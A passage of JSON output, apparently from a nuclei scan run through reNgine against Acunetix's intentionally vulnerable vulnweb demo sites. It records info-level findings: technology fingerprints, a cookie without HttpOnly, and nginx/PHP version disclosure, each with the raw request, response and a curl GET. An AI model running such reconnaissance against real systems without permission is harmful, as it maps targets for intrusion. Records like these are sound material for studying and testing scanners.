PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;www.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 33315\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;www.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\nwww.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"v=spf1 -all\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:48.23972692Z\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"google-font-api\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:48.308167634Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/cookies-without-httponly.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/cookies-without-httponly\",\"template-id\":\"cookies-without-httponly\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/cookies-without-httponly.yaml\",\"info\":{\"name\":\"Cookies without HttpOnly attribute - Detect\",\"author\":[\"princechaddha\",\"mr.bobo hp\"],\"tags\":[\"misconfig\",\"http\",\"cookie\",\"generic\"],\"description\":\"Checks whether cookies in the HTTP response contain the HttpOnly attribute. If the HttpOnly flag is set, it means that the cookie is HTTP-only\\n\",\"impact\":\"Lack of HttpOnly flag on cookies increases the risk of client-side attacks, compromising user session security and data privacy.\\n\",\"reference\":[\"https://owasp.org/www-community/HttpOnly\"],\"severity\":\"info\",\"metadata\":{\"verified\":true,\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":null,\"cvss-metrics\":\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\"},\"remediation\":\"Ensure that all cookies are set with the HttpOnly attribute to prevent client-side access.\\n\"},\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/logout\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 302 FOUND\\r\\nConnection: close\\r\\nContent-Length: 265\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nLocation: http://testhtml5.vulnweb.com/\\r\\nServer: nginx/1.19.0\\r\\nSet-Cookie: username=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Path=/\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:48.309998559Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:48 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:48.52945027Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.7) Gecko/20050414 Firefox/1.0.3' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/E7FBAF\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:48 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:48.586383555Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/E7FBAF' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 301 Moved Permanently\\r\\nConnection: close\\r\\nContent-Length: 169\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:34:46 GMT\\r\\nLocation: http://testphp.vulnweb.com/.idea/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:49.052003024Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3' 'http://testphp.vulnweb.com/.idea'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:49.523341948Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:49.529809269Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/nginx/nginx-version.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/nginx-version\",\"template-id\":\"nginx-version\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/nginx/nginx-version.yaml\",\"info\":{\"name\":\"Nginx version detect\",\"author\":[\"philippedelteil\",\"daffainfo\"],\"tags\":[\"tech\",\"nginx\"],\"description\":\"Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"extracted-results\":[\"nginx/1.19.0\"],\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:49.543253801Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"php\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:45 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd 